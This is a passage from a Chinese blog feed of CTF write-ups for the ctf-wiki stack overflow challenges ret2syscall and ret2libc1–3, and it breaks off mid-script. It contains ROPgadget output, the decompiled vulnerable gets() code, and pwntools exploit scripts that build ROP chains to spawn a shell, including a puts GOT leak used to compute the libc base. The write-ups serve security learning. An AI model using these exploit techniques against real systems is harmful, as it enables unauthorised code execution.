0x3</h2><p>我们需要构造的函数:<code>execve("/bin/sh", NULL, NULL)</code></p><p>其中该程序是 32 位,所以我们需要使得</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">eax = 0xb</span><br><span class="line">ebx --> "/bin/sh"</span><br><span class="line">ecx = 0</span><br><span class="line">edx = 0</span><br></pre></td></tr></table></figure><p>而我们如何控制这些寄存器的值 呢?这里就需要使用 gadgets。比如说,现在栈顶是 10,那么如果此时执行了 pop eax,那么现在 eax 的值就为 10。但是我们并不能期待有一段连续的代码可以同时控制对应的寄存器,所以我们需要一段一段控制,这也是我们在 gadgets 最后使用 ret 来再次控制程序执行流程的原因。具体寻找 gadgets 的方法,我们可以使用 ropgadgets 这个工具。</p><p>用下面这条命令来查找程序中所有 <code>pop reg; ret;</code> 指令</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --only 'pop|ret' | grep 'pop'</span><br><span class="line">0x0809dde2 : pop ds ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0809d7b2 : pop ds ; ret</span><br><span class="line">0x0809ddda : pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0807217a : pop eax ; ret 0x80e</span><br><span class="line">0x0804f704 : pop eax ; ret 3</span><br><span class="line">0x0805b6ed : pop ebp ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x0809e1d5 : pop ebp ; pop esi ; pop edi ; ret</span><br><span class="line">0x0804838e : pop ebp ; ret</span><br><span class="line">0x080a9a45 : pop ebp ; ret 0x10</span><br><span class="line">0x08096a29 : pop ebp ; ret 0x14</span><br><span class="line">0x08070d76 : pop ebp ; ret 0xc</span><br><span class="line">0x0804854a : pop ebp ; ret 4</span><br><span class="line">0x08049c00 : pop ebp ; ret 8</span><br><span class="line">0x0809e1d4 : pop ebx ; pop ebp ; pop esi ; pop edi ; ret</span><br><span class="line">0x080be23f : pop ebx ; pop edi ; ret</span><br><span class="line">0x0806eb69 : pop ebx ; pop edx ; ret</span><br><span class="line">0x08092258 : pop ebx ; pop esi ; pop ebp ; ret</span><br><span class="line">0x0804838b : pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080a9a42 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x10</span><br><span class="line">0x08096a26 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0x14</span><br><span class="line">0x08070d73 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 0xc</span><br><span class="line">0x08048547 : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 4</span><br><span class="line">0x08049bfd : pop ebx ; pop esi ; pop edi ; pop ebp ; ret 8</span><br><span class="line">0x08048913 : pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x08049a19 : pop ebx ; pop esi ; pop edi ; ret 4</span><br><span class="line">0x08049a94 : pop ebx ; pop esi ; ret</span><br><span class="line">0x080481c9 : pop ebx ; ret</span><br><span class="line">0x080d7d3c : pop ebx ; ret 0x6f9</span><br><span class="line">0x08099c87 : pop ebx ; ret 8</span><br><span class="line">0x0806eb91 : pop ecx ; pop ebx ; ret</span><br><span class="line">0x0804838d : pop edi ; pop ebp ; ret</span><br><span class="line">0x080a9a44 : pop edi ; pop ebp ; ret 0x10</span><br><span class="line">0x08096a28 : pop edi ; pop ebp ; ret 0x14</span><br><span class="line">0x08070d75 : pop edi ; pop ebp ; ret 0xc</span><br><span class="line">0x08048549 : pop edi ; pop ebp ; ret 4</span><br><span class="line">0x08049bff : pop edi ; pop ebp ; ret 8</span><br><span class="line">0x0806336b : pop edi ; pop esi ; pop ebx ; ret</span><br><span class="line">0x0805c508 : pop edi ; pop esi ; ret</span><br><span class="line">0x0804846f : pop edi ; ret</span><br><span class="line">0x08049a1b : pop edi ; ret 4</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br><span class="line">0x0806eb6a : pop edx ; ret</span><br><span class="line">0x0809ddd9 : pop es ; pop eax ; pop ebx ; pop esi ; pop edi ; ret</span><br><span class="line">0x080671ea : pop es ; pop edi ; ret</span><br><span class="line">0x0806742a : pop es ; ret</span><br><span class="line">0x08092259 : pop esi ; pop ebp ; ret</span><br><span class="line">0x0806eb68 : pop esi ; pop ebx ; pop edx ; ret</span><br><span class="line">0x0805c820 : pop esi ; pop ebx ; ret</span><br><span class="line">0x0804838c : pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080a9a43 : pop esi ; pop edi ; pop ebp ; ret 0x10</span><br><span class="line">0x08096a27 : pop esi ; pop edi ; pop ebp ; ret 0x14</span><br><span class="line">0x08070d74 : pop esi ; pop edi ; pop ebp ; ret 0xc</span><br><span class="line">0x08048548 : pop esi ; pop edi ; pop ebp ; ret 4</span><br><span class="line">0x08049bfe : pop esi ; pop edi ; pop ebp ; ret 8</span><br><span class="line">0x0804846e : pop esi ; pop edi ; ret</span><br><span class="line">0x08049a1a : pop esi ; pop edi ; ret 4</span><br><span class="line">0x08049a95 : pop esi ; ret</span><br><span class="line">0x08050256 : pop esp ; pop ebx ; pop esi ; pop edi ; pop ebp ; ret</span><br><span class="line">0x080bb146 : pop esp ; ret</span><br><span class="line">0x0807b6ed : pop ss ; pop ebx ; ret</span><br><span class="line">0x080639f9 : pop ss ; ret 0x2c73</span><br><span class="line">0x080643ba : pop ss ; ret 0x3273</span><br><span class="line">0x080639e4 : pop ss ; ret 0x3e73</span><br><span class="line">0x080643a0 : pop ss ; ret 0x4c73</span><br><span class="line">0x080639cf : pop ss ; ret 0x5073</span><br><span class="line">0x080639ba : pop ss ; ret 0x6273</span><br><span class="line">0x08064386 : pop ss ; ret 0x6673</span><br><span class="line">0x08061f05 : pop ss ; ret 0x830f</span><br></pre></td></tr></table></figure><p>我们分别选择以下指令来布置寄存器:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">0x080bb196 : pop eax ; ret</span><br><span class="line">0x0806eb90 : pop edx ; pop ecx ; pop ebx ; ret</span><br></pre></td></tr></table></figure><p>此外,我们需要获得 /bin/sh 字符串对应的地址 和 <code>int 0x80</code> 对应的地址</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --string '/bin/sh' </span><br><span class="line">Strings information</span><br><span class="line">============================================================</span><br><span class="line">0x080be408 : /bin/sh</span><br><span class="line">sakura@Kylin:~/下载/ret2syscall$ ROPgadget --binary rop --only 'int'</span><br><span class="line">Gadgets information</span><br><span class="line">============================================================</span><br><span class="line">0x08049421 : int 0x80</span><br><span class="line"></span><br><span class="line">Unique gadgets found: 1</span><br></pre></td></tr></table></figure><p>接下来就是构建payload了。</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">|+————————+|</span><br><span class="line">|+aaaaaaaa+|</span><br><span class="line">|+........+|</span><br><span class="line">|+aaaaaaaa+|</span><br><span class="line">|+pop eax; ret+|</span><br><span class="line">|+0xb+|</span><br><span class="line">|+pop edx; pop ecx; pop ebx; ret+|</span><br><span class="line">|+0x0+|</span><br><span class="line">|+0x0+|</span><br><span class="line">|+/bin/sh+|</span><br><span class="line">|+int 0x80+|</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2syscall.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">'./rop'</span>)</span><br><span class="line"></span><br><span class="line">pop_eax = <span class="number">0x080bb196</span></span><br><span class="line">pop_edx_ecx_ebx = <span class="number">0x0806eb90</span></span><br><span class="line">int_0x80 = <span class="number">0x08049421</span></span><br><span class="line">binsh = <span class="number">0x080be408</span></span><br><span class="line"></span><br><span class="line">payload = <span class="string">b"a"</span>*(<span class="number">112</span>)</span><br><span class="line">payload += p32(pop_eax)</span><br><span class="line">payload += p32(<span class="number">0xb</span>)</span><br><span class="line">payload += p32(pop_edx_ecx_ebx)</span><br><span class="line">payload += p32(<span class="number">0x0</span>)</span><br><span class="line">payload += p32(<span class="number">0x0</span>)</span><br><span class="line">payload += p32(binsh)</span><br><span class="line">payload += p32(int_0x80)</span><br><span class="line"></span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><h2 id="0x4"><a class="markdownIt-Anchor" href="#0x4"></a> 0x4</h2><p><strong>测试</strong></p><p><img src="/2022/09/18/ret2syscall/image-20220915000135702.png" alt="image-20220915000135702"></p>]]></content>
<summary type="html"><blockquote>
<p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">题目地址</a> ret2syscall</p>
</blockquote>
<h</summary>
<category term="CTF" scheme="https://www.rgzzplus.com/categories/CTF/"/>
<category term="ret2syscall" scheme="https://www.rgzzplus.com/tags/ret2syscall/"/>
</entry>
<entry>
<title>ret2libc</title>
<link href="https://www.rgzzplus.com/2022/09/18/ret2libc/"/>
<id>https://www.rgzzplus.com/2022/09/18/ret2libc/</id>
<published>2022-09-18T02:24:41.000Z</published>
<updated>2022-09-18T02:52:32.005Z</updated>
<content type="html"><![CDATA[<blockquote><p><a href="https://github.com/ctf-wiki/ctf-challenges/tree/master/pwn/stackoverflow">题目地址</a> ret2libc</p></blockquote><h1 id="ret2libc"><a class="markdownIt-Anchor" href="#ret2libc"></a> ret2libc</h1><h2 id="0x1"><a class="markdownIt-Anchor" href="#0x1"></a> 0x1</h2><p>将文件下载到本地后,file 查看文件类型,顺便 checksec 看看保护机制。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ file ret2libc1</span><br><span class="line">ret2libc1: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=fb89c86b266de4ff294489da59959a62f7aa1e61, with debug_info, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ checksec ret2libc1</span><br><span class="line">[*] '/home/sakura/下载/ret2libc/ret2libc1/ret2libc1'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br></pre></td></tr></table></figure><p>源程序为 32 位,开启了 NX 保护。</p><h2 id="0x2"><a class="markdownIt-Anchor" href="#0x2"></a> 0x2</h2><p>拖进 IDA 来看一下程序源代码,确定漏洞位置。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> v4[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> setvbuf(_bss_start, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"RET2LIBC >_<"</span>);</span><br><span class="line"> gets(v4);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>可以看到这里有个 gets 函数,可以确定就是 gets 函数发生了栈溢出。</p><h2 id="0x3"><a class="markdownIt-Anchor" href="#0x3"></a> 0x3</h2><p>利用 ropgadget 看看是否有 /bin/sh 字符串。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc1$ ROPgadget --binary ret2libc1 --string '/bin/sh' </span><br><span class="line">Strings information</span><br><span class="line">============================================================</span><br><span class="line">0x08048720 : /bin/sh</span><br></pre></td></tr></table></figure><p>确实存在,在 IDA 中查找一下是否有 system 函数存在。</p><p><img src="/2022/09/18/ret2libc/image-20220915163027797.png" alt="image-20220915163027797"></p><p>那么我们直接返回 system 处,即执行 system 函数。相应的 payload 如下:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2libc1.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./ret2libc1'</span>)</span><br><span class="line"></span><br><span class="line">binsh = <span class="number">0x08048720</span></span><br><span class="line">system_plt = <span class="number">0x08048460</span></span><br><span class="line">payload = flat([<span class="string">b'a'</span> * <span class="number">112</span>, system_plt, <span class="string">b'b'</span> * <span class="number">4</span>, binshaddr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p>这里我们需要注意函数调用栈的结构,如果是正常调用 system 函数,我们调用的时候会有一个对应的返回地址,这里以’bbbb’ 作为虚假的地址,其后参数对应的参数内容。</p><p>这个例子相对来说简单,同时提供了 system 地址与 /bin/sh 的地址,但是大多数程序并不会有这么好的情况。</p><p><img src="/2022/09/18/ret2libc/image-20220915162822205.png" alt="image-20220915162822205"></p><h1 id="ret2libc2"><a class="markdownIt-Anchor" href="#ret2libc2"></a> ret2libc2</h1><h2 id="0x1-2"><a class="markdownIt-Anchor" href="#0x1-2"></a> 0x1</h2><p>该题目与 ret2libc1 基本一致,只不过不再出现 /bin/sh 字符串,所以此次需要我们自己来读取字符串,所以**我们需要两个 gadgets,第一个控制程序读取字符串,第二个控制程序执行 system("/bin/sh")。**由于漏洞与上述一致,这里就不在多说。</p><p><img src="/2022/09/18/ret2libc/image-20220915163514956.png" alt="image-20220915163514956"></p><p><img src="/2022/09/18/ret2libc/image-20220915163926447.png" alt="image-20220915163926447"></p><p><img src="/2022/09/18/ret2libc/image-20220915164247643.png" alt="image-20220915164247643"></p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">##!/usr/bin/env python</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = process(<span class="string">'./ret2libc2'</span>)</span><br><span class="line"></span><br><span class="line">gets_plt = <span class="number">0x08048460</span></span><br><span class="line">system_plt = <span class="number">0x08048490</span></span><br><span class="line">pop_ebx = <span class="number">0x0804843d</span></span><br><span class="line">buf2 = <span class="number">0x804a080</span></span><br><span class="line">payload = flat(</span><br><span class="line"> [<span class="string">b'a'</span> * <span class="number">112</span>, gets_plt, pop_ebx, buf2, system_plt, <span class="number">0xdeadbeef</span>, buf2])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line">sh.sendline(<span class="string">b'/bin/sh'</span>)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220915164417103.png" alt="image-20220915164417103"></p><h1 id="ret2libc3"><a class="markdownIt-Anchor" href="#ret2libc3"></a> ret2libc3</h1><h2 id="0x1-3"><a class="markdownIt-Anchor" href="#0x1-3"></a> 0x1</h2><p>在例 ret2libc2 的基础上,再次将 system 函数的地址去掉。此时,我们需要同时找到 system 函数地址与 /bin/sh 字符串的地址。首先,查看安全保护。</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc3$ file ret2libc3</span><br><span class="line">ret2libc3: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.24, BuildID[sha1]=c0ad441ebd58b907740c1919460c37bb99bb65df, with debug_info, not stripped</span><br><span class="line">sakura@Kylin:~/下载/ret2libc/ret2libc3$ checksec ret2libc3</span><br><span class="line">[*] '/home/sakura/下载/ret2libc/ret2libc3/ret2libc3'</span><br><span class="line"> Arch: i386-32-little</span><br><span class="line"> RELRO: Partial RELRO</span><br><span class="line"> Stack: No canary found</span><br><span class="line"> NX: NX enabled</span><br><span class="line"> PIE: No PIE (0x8048000)</span><br></pre></td></tr></table></figure><p>可以看出,源程序仍旧开启了堆栈不可执行保护。进而查看源码,发现程序的 bug 仍然是栈溢出</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> __cdecl <span class="title function_">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">const</span> <span class="type">char</span> **argv, <span class="type">const</span> <span class="type">char</span> **envp)</span></span><br><span class="line">{</span><br><span class="line"> <span class="type">char</span> v4[<span class="number">100</span>]; <span class="comment">// [esp+1Ch] [ebp-64h] BYREF</span></span><br><span class="line"></span><br><span class="line"> setvbuf(<span class="built_in">stdout</span>, <span class="number">0</span>, <span class="number">2</span>, <span class="number">0</span>);</span><br><span class="line"> setvbuf(<span class="built_in">stdin</span>, <span class="number">0</span>, <span class="number">1</span>, <span class="number">0</span>);</span><br><span class="line"> <span class="built_in">puts</span>(<span class="string">"No surprise anymore, system disappeard QQ."</span>);</span><br><span class="line"> <span class="built_in">printf</span>(<span class="string">"Can you find it !?"</span>);</span><br><span class="line"> gets(v4);</span><br><span class="line"> <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h2 id="0x2-2"><a class="markdownIt-Anchor" href="#0x2-2"></a> 0x2</h2><p>那么我们如何得到 system 函数的地址呢?这里就主要利用了两个知识点</p><ul><li>system 函数属于 libc,而 <a href="http://libc.so">libc.so</a> 动态链接库中的函数之间相对偏移是固定的。</li><li>即使程序有 ASLR 保护,也只是针对于地址中间位进行随机,最低的 12 位并不会发生改变。而 libc 在 github 上有人进行收集,如下</li><li><a href="https://github.com/niklasb/libc-database">https://github.com/niklasb/libc-database</a></li></ul><p>所以如果我们知道 libc 中某个函数的地址,那么我们就可以确定该程序利用的 libc。进而我们就可以知道 system 函数的地址。</p><p>那么如何得到 libc 中的某个函数的地址呢?我们一般常用的方法是采用 got 表泄露,即输出某个函数对应的 got 表项的内容。<strong>当然,由于 libc 的延迟绑定机制,我们需要泄漏已经执行过的函数的地址。</strong></p><p>我们自然可以根据上面的步骤先得到 libc,之后在程序中查询偏移,然后再次获取 system 地址,但这样手工操作次数太多,有点麻烦,这里给出一个 libc 的利用工具,具体细节请参考 readme</p><ul><li><a href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></li></ul><blockquote> <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment">#第二个参数,为已泄露的实际地址,或最后12位(比如:d90),int类型</span></span><br><span class="line">obj = LibcSearcher(<span class="string">"fgets"</span>, <span class="number">0X7ff39014bd90</span>)</span><br><span class="line"></span><br><span class="line">obj.dump(<span class="string">"system"</span>) <span class="comment">#system 偏移</span></span><br><span class="line">obj.dump(<span class="string">"str_bin_sh"</span>) <span class="comment">#/bin/sh 偏移</span></span><br><span class="line">obj.dump(<span class="string">"__libc_start_main_ret"</span>) </span><br></pre></td></tr></table></figure><p>如果遇到返回多个libc版本库的情况,可以通过<code>add_condition(leaked_func, leaked_address)</code>来添加限制条件,也可以手工选择其中一个libc版本(如果你确定的话)。</p></blockquote><p>此外,在得到 libc 之后,其实 libc 中也是有 /bin/sh 字符串的,所以我们可以一起获得 /bin/sh 字符串的地址。</p><hr><p><strong><a href="https://www.cnblogs.com/wgf4242/p/13091061.html">溢出思路总结</a></strong></p><p>1、泄露一个ret2libc3函数的位置</p><p>2、获取libc的版本(只有被执行过的函数才能获取地址)</p><p>①<a href="https://libc.blukat.me/">https://libc.blukat.me</a></p><p>②LibcSearcher: <a href="https://github.com/lieanu/LibcSearcher">https://github.com/lieanu/LibcSearcher</a></p><p>3、根据偏移获取shell和sh的位置</p><p>①求libc基地址(函数动态地址一函数偏移量)</p><p>②求其他函数地址(基地址+函数偏移量)</p><p>4、执行程序获取shell</p><hr><p>这里我们泄露 __libc_start_main 的地址,这是因为它是程序最初被执行的地方。基本利用思路如下</p><ul><li>泄露 __libc_start_main 地址</li><li>获取 libc 版本</li><li>获取 system 地址与 /bin/sh 的地址</li><li>再次执行源程序</li><li>触发栈溢出执行 system(‘/bin/sh’)</li></ul><p>exp 如下:</p><p>1、手动获取libc基地址</p><p>这里面需要用到三个offset,分别为system、puts和sh,可以用 <a href="https://libc.blukat.me">libc database search</a> 网站来获取 libc 基地址</p><p><img src="/2022/09/18/ret2libc/image-20220916221437793.png" alt="image-20220916221437793"></p><p>也可以用指令获取:(注意是 IO_puts,之前我一直搜 puts 的地址,结果做不出来)</p><figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">strings /lib/i386-linux-gnu/libc.so.6 -tx | grep "bin/sh"</span><br><span class="line">readelf -a /lib/i386-linux-gnu/libc.so.6| grep "IO_puts"</span><br><span class="line">readelf -a /lib/i386-linux-gnu/libc.so.6| grep "system"</span><br></pre></td></tr></table></figure><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2libc3_auto.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line">sh = process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">ret2libc3 = ELF(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">puts_plt = ret2libc3.plt[<span class="string">'puts'</span>]</span><br><span class="line">puts_got = ret2libc3.got[<span class="string">'puts'</span>]</span><br><span class="line">main = ret2libc3.symbols[<span class="string">'_start'</span>]</span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"ready leak libc..."</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">112</span>, puts_plt, main, puts_got])</span><br><span class="line">sh.sendlineafter(<span class="string">b'Can you find it !?'</span>, payload)</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">"get the related addr"</span>)</span><br><span class="line">puts_addr = u32(sh.recv()[<span class="number">0</span>:<span class="number">4</span>])</span><br><span class="line"><span class="built_in">print</span>(<span class="string">"puts:"</span> + <span class="built_in">hex</span>(puts_addr))</span><br><span class="line">libcbase = puts_addr - <span class="number">0x071cd0</span></span><br><span class="line">system_addr = libcbase + <span class="number">0x045830</span></span><br><span class="line">binsh_addr = libcbase + <span class="number">0x192352</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">input</span>(<span class="string">"ready get shell"</span>)</span><br><span class="line">payload = flat([<span class="string">b'A'</span> * <span class="number">104</span>, system_addr, <span class="number">0xdeadbeef</span>, binsh_addr])</span><br><span class="line">sh.sendline(payload)</span><br><span class="line"></span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure><p><img src="/2022/09/18/ret2libc/image-20220916220159305.png" alt="image-20220916220159305"></p><p>2、利用工具自动获取libc基地址</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ret2libc3_auto.py</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> LibcSearcher</span><br><span class="line">sh = process(<span class="string">'./ret2libc3'</span>)</span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span 